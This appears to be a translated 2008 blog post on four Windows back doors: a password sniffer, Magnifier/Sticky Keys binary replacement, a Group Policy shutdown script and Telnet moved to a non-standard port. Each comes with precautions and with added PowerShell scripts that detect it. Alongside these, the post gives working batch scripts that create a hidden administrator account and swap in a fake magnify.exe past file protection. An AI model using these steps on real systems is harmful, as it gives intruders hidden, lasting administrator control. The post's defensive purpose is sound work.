Saturday, November 1, 2008

Four Windows system back doors

A back door is the attacker's channel in and out of a system: hidden, and dangerous. When an attacker walks into a system as if it were unguarded territory, one of the following four back doors is usually involved. Not all of them are easy to understand, but each one is a very dangerous back door.
1. Sniffer back door: the most dangerous
This back door works as follows: after taking control of a host, the attacker creates no new account but installs a sniffer on the host to capture the administrator's password. Because no account is added and the password is obtained by sniffing, it is extremely stealthy. An administrator without strong security awareness and adequate skills will simply never find it.
(1) Installing the sniffer
The attacker downloads or uploads the sniffer to the server and installs it. These sniffers are usually small and single-purpose, and are often built as drivers, which makes them very hard to notice and even harder to remove cleanly.
(2) Obtaining the administrator password
Once running, the sniffer monitors the system; when the administrator logs on to the server, the password is captured and saved to a txt file. The next time the attacker connects to the server, he opens the txt file and reads the administrator password. From then on he no longer needs to create an account: he logs on directly with the legitimate administrator account. If the server runs a web site, the attacker may place the txt file in a web directory so that it can be read in a browser.
(3) Precautions
Because the sniffer back door uses a normal administrator account, it is hard to spot. Any intrusion leaves traces, however: enable the audit policy in Group Policy so that user logons are recorded, then check the Event Viewer for logons at suspicious times. A clever attacker may delete or alter the system log, so the most thorough measure is to find and remove the sniffer installed on the system, then change the administrator password.
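As an added example (not part of the original post), a PowerShell script that does what the precaution above describes: it pulls the recorded logons out of the Security log and summarises them per account, so a legitimate administrator account used at unusual hours or from an unexpected address stands out. It assumes a Windows version with event ID 4624 (Vista/2008 and later), and the business hours used for the off-hours flag are an assumption.

```powershell
# Added example (not from the original post). Summarise the successful logons recorded
# in the Security log per account, so that a legitimate administrator account used at
# odd hours or from an unexpected address stands out: that is the only trace a sniffer
# back door leaves. Assumes event ID 4624 (Vista/2008 and later); the Windows 2003 IDs
# 528/540 carry the same fields in another layout. Business hours are an assumption.
function Get-LogonSummary {
    param(
        [int]$Days = 7,
        [int]$WorkStart = 8,    # local hours [WorkStart, WorkEnd) count as business hours
        [int]$WorkEnd = 19
    )
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction Stop | ForEach-Object {
        $field = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $field[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            User      = "$($field.TargetDomainName)\$($field.TargetUserName)"
            LogonType = [int]$field.LogonType    # 2 interactive, 3 network, 10 Remote Desktop
            Source    = $field.IpAddress
            OffHours  = ($_.TimeCreated.Hour -lt $WorkStart) -or ($_.TimeCreated.Hour -ge $WorkEnd)
        }
    } | Where-Object {
        # Keep names ending in "$" (the post's hidden user is gslw$); drop only the
        # well-known service identities that log on constantly.
        ($_.LogonType -in 2, 3, 10) -and ($_.User -notmatch '^(NT AUTHORITY|Window Manager|Font Driver Host)\\')
    }
}

# One row per account: volume, first and last logon, distinct sources, off-hours count.
function Get-LogonReport {
    param([int]$Days = 7)
    Get-LogonSummary -Days $Days | Group-Object User | ForEach-Object {
        $sorted = @($_.Group | Sort-Object Time)
        [pscustomobject]@{
            User      = $_.Name
            Logons    = $_.Count
            FirstSeen = $sorted[0].Time
            LastSeen  = $sorted[-1].Time
            Sources   = (@($_.Group | ForEach-Object Source) | Sort-Object -Unique) -join ', '
            OffHours  = @($_.Group | Where-Object { $_.OffHours }).Count
        }
    } | Sort-Object OffHours -Descending
}

Get-LogonReport | Format-Table -AutoSize
```

Run it from an elevated prompt; an administrator account whose Sources column suddenly gains an address nobody recognises is the case the post warns about.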
2. Magnifier back door: the most cunning
Magnifier (magnify.exe) is a small tool built into Windows 2000/XP/2003 for visually impaired users. It can be launched with the Win+U key combination before any user logs on, so an attacker replaces it with a carefully crafted file of the same name, magnify.exe, in order to take control of the server. Typically the crafted magnify.exe creates an administrator account, after which the attacker logs on to the system; sometimes it simply launches a command prompt (cmd.exe) or the system shell (explorer.exe). Note that these programs run with SYSTEM privileges, the highest on the system. So that an administrator who happens to run Magnifier notices nothing wrong, the attacker's program carries out the required operations and then, as its last step, launches the real Magnifier to deceive the administrator. The method is as follows:
(1) Construct the batch script

    @echo off
    net user gslw$ test168 /add
    net localgroup administrators gslw$ /add
    %Windir%\system32\nagnify.exe
    exit

Save the script above as magnify.bat. It creates the administrator user gslw$ with the password test168 and finally runs nagnify.exe, the renamed real Magnifier program.
(2) Convert the file format
Because magnify.bat has the .bat extension, it must be converted into an .exe file of the same name before the Win+U key combination will launch it. An attacker can build a self-extracting exe with WinRAR, or use bat2com and com2exe to convert the file format; the latter is used for the demonstration here. Open a command prompt, change to the directory holding the bat2com and com2exe tools, then run the command "bat2com magnify.bat" to turn magnify.bat into magnify.com, and run "com2exe magnify.com" to turn magnify.com into magnify.exe. The batch file has now become an executable with the same name as the Magnifier program.
(3) Replace the Magnifier file
The crafted magnify.exe now has to replace the Magnifier program file. Because Windows protects its system files, the file cannot simply be overwritten, but Windows ships a command, replace.exe, that can replace system files. In addition, since the files in system32 are backed up in %Windir%\system32\dllcache, the magnify.exe in that directory must be replaced first, or the replaced file will just be restored. Assuming the crafted magnify.exe is in the %Windir% directory, a batch file does the replacement:

    @echo off
    copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
    copy %Windir%\system32\magnify.exe nagnify.exe
    replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
    replace.exe %Windir%\magnify.exe %Windir%\system32
    exit

This batch file first backs up the Magnifier program as nagnify.exe and then replaces it with the crafted program of the same name.

(4) Exploiting the back door
With the steps above completed, the Magnifier back door is in place. The attacker connects to the server with Remote Desktop Connection, presses the Win+U key combination at the logon window and chooses "Magnifier"; at that moment the server creates the administrator user gslw$ and opens the Magnifier tool, and the attacker then logs on to the server with that account. Before logging off, of course, he deletes the account and all related traces so that the administrator does not discover him.
(5) Precautions
Go to %Windir%\system32 and check whether magnify.exe still shows the original Magnifier icon; if it does not, it has most likely been turned into a back door. Of course, the attacker may change the file's icon to match the original program's. In that case compare the size and modification time of magnify.exe; if either does not match, the file is suspect. We can also run magnify.exe and then run lusrmgr.msc to see whether a suspicious user has appeared. If a Magnifier back door has been planted on the server, first delete the file, then restore the normal Magnifier program. To be more thorough, replace Magnifier with another program altogether. We can even turn the attacker's own trick against him: build a magnify.exe of our own that warns the attacker off, or captures evidence of the intrusion and of who controls it.

Note: a similar "sticky keys" back door exists. Pressing the SHIFT key five times activates Sticky Keys; its use and its prevention mirror the Magnifier back door, with sethc.exe taking the place of magnify.exe.

3. Group Policy back door: the most hidden

Group Policy is another place where back doors hide. Adding an entry to the corresponding registry keys so that a Trojan starts with the system is a well-known, commonly used tactic. Group Policy can do the same, and more: it can also run operations when the system shuts down. This is done through the "Scripts (Startup/Shutdown)" item, located under "Computer Configuration → Windows Settings". Because it is so well hidden, attackers often use it as a back door on servers: once an attacker controls a server, this back door gives him long-term control over the host.
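The following PowerShell check is an added example, not code from the post, covering the Magnifier and Sticky Keys precautions in section 2 above: it compares magnify.exe and sethc.exe with their dllcache backups by size and modification time as the post suggests, adds an Authenticode signature check and an optional hash comparison against a known-good copy, and lists local accounts whose names end in "$" like the post's gslw$. The dllcache layout assumed is that of Windows 2000/XP/2003.

```powershell
# Added example (not from the original post). Checks the two accessibility binaries the
# post names, magnify.exe and sethc.exe, for the signs it lists (size and modification
# time versus the %Windir%\system32\dllcache backup), adds an Authenticode check and an
# optional hash comparison with a known-good copy, and lists local accounts ending in "$"
# like the post's gslw$. dllcache exists on Windows 2000/XP/2003 only; elsewhere that
# comparison is skipped. Run from an elevated prompt.
$System32 = Join-Path $env:WINDIR 'system32'
$DllCache = Join-Path $System32 'dllcache'

function Test-AccessibilityBinary {
    param(
        [Parameter(Mandatory)][string]$Name,
        [string]$ReferenceDir    # optional folder with clean copies, e.g. from an untouched server
    )
    $live = Join-Path $System32 $Name
    if (-not (Test-Path $live)) {
        return [pscustomobject]@{ File = $Name; Suspicious = $true; Reasons = 'missing' }
    }
    $reasons = @()
    # Microsoft binaries are signed; a bat2com/com2exe product or a WinRAR self-extractor is
    # not. From Windows 8 on this also covers catalog-signed files; on older systems NotSigned
    # is inconclusive for system files and the reference hash below decides.
    $sig = Get-AuthenticodeSignature -FilePath $live
    if ($sig.Status -ne 'Valid') { $reasons += "signature: $($sig.Status)" }
    $backup = Join-Path $DllCache $Name
    if (Test-Path $backup) {
        $a = Get-Item $live; $b = Get-Item $backup
        if ($a.Length -ne $b.Length)               { $reasons += 'size differs from dllcache copy' }
        if ($a.LastWriteTime -ne $b.LastWriteTime) { $reasons += 'timestamp differs from dllcache copy' }
    }
    if ($ReferenceDir -and (Test-Path (Join-Path $ReferenceDir $Name))) {
        $liveHash = (Get-FileHash -Algorithm SHA256 -Path $live).Hash
        $refHash  = (Get-FileHash -Algorithm SHA256 -Path (Join-Path $ReferenceDir $Name)).Hash
        if ($liveHash -ne $refHash) { $reasons += 'hash differs from reference copy' }
    }
    [pscustomobject]@{ File = $Name; Suspicious = ($reasons.Count -gt 0); Reasons = ($reasons -join '; ') }
}

# "net user" omits accounts whose names end in "$" (lusrmgr.msc shows them), which is
# what makes the post's gslw$ easy to miss; enumerate local users through ADSI instead.
function Get-DollarAccounts {
    ([ADSI]"WinNT://$env:COMPUTERNAME,computer").Children |
        Where-Object { $_.SchemaClassName -eq 'User' -and $_.Name.Value -like '*$' } |
        ForEach-Object { $_.Name.Value }
}

'magnify.exe', 'sethc.exe' | ForEach-Object { Test-AccessibilityBinary -Name $_ } | Format-Table -AutoSize
$hidden = @(Get-DollarAccounts)
if ($hidden) { "Accounts ending in `$: $($hidden -join ', ')" } else { 'No accounts ending in $.' }
```

Because the post's own batch file replaces the dllcache copy as well, the size and timestamp comparison alone can come back clean; the signature or reference-hash result is the one to trust.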
Through this back door certain programs or scripts can be run; the simplest case is creating an administrator user, which is done like this:
(1) Create the script

Create a batch file add.bat with the following content: @echo off & net user gslw$ test168 /add && net localgroup administrators gslw$ /add & exit (this creates the administrator user gslw$ with the password test168).
(2) Use the back door

In the "Run" dialog, type gpedit.msc and navigate to "Computer Configuration → Windows Settings → Scripts (Startup/Shutdown)". Double-click "Shutdown" in the right-hand pane and add add.bat there. In other words, the user gslw$ is created every time the system shuts down. An ordinary user does not know the system has this hidden user, and even if he sees and deletes the account, it is created again at the next shutdown. A user who does not know about this place in Group Policy will never understand what is happening. In fact Group Policy offers many such "back door" uses: through it an attacker can run scripts or programs, sniff the administrator's password, and so on. Once attackers have the administrator's password they no longer need to create an account at all and simply log on remotely with the administrator account. It is therefore a double-edged sword, and we hope administrators give it the attention it deserves. If your server suffers inexplicable attacks, the attacker may be getting in this way.
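As an added example (not the post's own code), a PowerShell script that lists what is registered under the Scripts (Startup/Shutdown) item the post points to, by reading the local GPO's scripts.ini and psscripts.ini, and flags any script that creates or elevates a local account the way add.bat does. The folder, file names, section names and key layout are assumed to be those of the local Group Policy store.

```powershell
# Added example (not from the original post). Lists what is registered under Computer
# Configuration -> Windows Settings -> Scripts (Startup/Shutdown) in the local GPO, which
# gpedit.msc stores in scripts.ini (psscripts.ini for PowerShell scripts) as [Startup] and
# [Shutdown] sections with NCmdLine/NParameters keys, and flags scripts that create or
# elevate a local account the way the post's add.bat does. The store path and the key
# layout assumed here are those of the local Group Policy folder. Run elevated.
$ScriptsDir = Join-Path $env:WINDIR 'System32\GroupPolicy\Machine\Scripts'

function Get-LocalGpoScripts {
    param([string]$IniName = 'scripts.ini')
    $iniPath = Join-Path $ScriptsDir $IniName
    if (-not (Test-Path $iniPath)) { return }
    $phase = $null
    $entries = @{}
    foreach ($raw in Get-Content -Path $iniPath -Force) {
        $line = $raw.Trim()
        if ($line -match '^\[(\w+)\]$') { $phase = $Matches[1]; continue }
        if ($phase -and $line -match '^(\d+)(CmdLine|Parameters)=(.*)$') {
            $key = "$phase/$($Matches[1])"
            if (-not $entries.ContainsKey($key)) {
                $entries[$key] = @{ Phase = $phase; Index = [int]$Matches[1]; CmdLine = ''; Parameters = '' }
            }
            $entries[$key][$Matches[2]] = $Matches[3]
        }
    }
    foreach ($e in $entries.Values) {
        # A bare file name refers to Scripts\<Phase>\; an absolute path is used as-is.
        $path = $e.CmdLine
        if ($path -and -not [IO.Path]::IsPathRooted($path)) { $path = Join-Path (Join-Path $ScriptsDir $e.Phase) $path }
        $exists = [bool]$path -and (Test-Path -LiteralPath $path)
        $body = if ($exists) { (Get-Content -LiteralPath $path) -join "`n" } else { '' }
        [pscustomobject]@{
            Phase       = $e.Phase
            Index       = $e.Index
            CmdLine     = $e.CmdLine
            Parameters  = $e.Parameters
            Exists      = $exists
            # The post's pattern: "net user X Y /add" then "net localgroup administrators X /add".
            AddsAccount = [bool]($body -match 'net\s+user\s+\S+.*/add|net\s+localgroup\s+administrators\b.*/add')
        }
    }
}

'scripts.ini', 'psscripts.ini' | ForEach-Object { Get-LocalGpoScripts -IniName $_ } | Format-Table -AutoSize
```

An entry whose script no longer exists on disk (Exists = False) is also worth a look: it may be the leftover of a script that was removed without clearing the policy.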
4. Telnet back door: the most easily overlooked
Telnet is a command-line remote management tool, but it is rarely used to manage servers and is therefore often ignored by administrators. When an attacker controls a server, opening "Remote Desktop" for remote control is easily noticed by the administrator, whereas remote control over Telnet is not easy to detect. However, Telnet listens on port 23 by default, and if that port is open others can easily scan for it, so the attacker changes the Telnet port and thereby keeps exclusive control over the server.
(1) Change the port

To change the Telnet port of a Windows 2003 server locally: Start → Run, enter cmd to open a command prompt, then run the command "tlntadmn config port=800" (800 is the new Telnet port; to avoid conflicts, do not choose the port of a well-known service). The Telnet port of a remote server can also be changed from the command prompt with the command "tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168" (\\192.168.1.9 is the remote host's IP, port=800 is the new Telnet port, -u specifies the remote user name and -p the remote user's password).
(2) Connect over Telnet

From a local command prompt (cmd.exe) the attacker runs the command "telnet 192.168.1.9 800", enters the user name and password, and is connected to the server over Telnet.
(3) Precautions

The Telnet back door is simple to counter: the command "tlntadmn config port=n" changes its port back, and for a more thorough fix run "services.msc" to open the Services console and disable the Telnet service.
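An added PowerShell example (not from the post) for the precaution just described: it reports whether the Telnet service is installed, which port it is configured to use, and whether anything is actually listening there, and can disable the service. The service name TlntSvr and the registry value TelnetPort are assumptions about the Windows Telnet server component; a port such as the post's 800 is what the NonDefault column flags.

```powershell
# Added example (not from the original post). Reports the Windows Telnet server's state
# and configured port so a non-default port like the post's 800 stands out, and can
# disable the service as the post recommends. Assumptions: the service name TlntSvr and
# the value HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\TelnetPort belong to the Telnet
# server component; 23 is its default. netstat is parsed so this also runs on older systems.
function Get-TelnetServerState {
    param([switch]$Disable)   # -Disable stops the service and sets its start type to Disabled
    $service = Get-Service -Name TlntSvr -ErrorAction SilentlyContinue
    if (-not $service) {
        return [pscustomobject]@{ Installed = $false; Status = 'not installed'; Port = $null; Listening = $false }
    }
    $port = 23
    $regPath = 'HKLM:\SOFTWARE\Microsoft\TelnetServer\1.0'
    if (Test-Path $regPath) {
        $value = (Get-ItemProperty -Path $regPath -Name TelnetPort -ErrorAction SilentlyContinue).TelnetPort
        if ($value) { $port = [int]$value }
    }
    # Check what is actually bound: a "TCP <addr>:<port> ... LISTENING" line for that port.
    $pattern = "^\s*TCP\s+\S+:$port\s+\S+\s+LISTENING"
    $listening = [bool](netstat -an -p tcp | Select-String -Pattern $pattern -Quiet)
    if ($Disable) {
        Stop-Service -Name TlntSvr -Force -ErrorAction SilentlyContinue
        Set-Service -Name TlntSvr -StartupType Disabled
    }
    [pscustomobject]@{
        Installed  = $true
        Status     = (Get-Service -Name TlntSvr).Status
        StartMode  = (Get-CimInstance Win32_Service -Filter "Name='TlntSvr'").StartMode
        Port       = $port
        NonDefault = ($port -ne 23)
        Listening  = $listening
    }
}

Get-TelnetServerState | Format-List
```

Run it from an elevated prompt; a Telnet service that is running on a port other than 23 on a server nobody manages over Telnet is exactly the situation the post describes.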
Summary: Whatever kind of back door it is, all of them share one trait: they hide and shun the light. With a certain level of system knowledge and constant vigilance you can expose any back door. Know your enemy: understanding how back doors work is what allows us to eliminate them at the root.
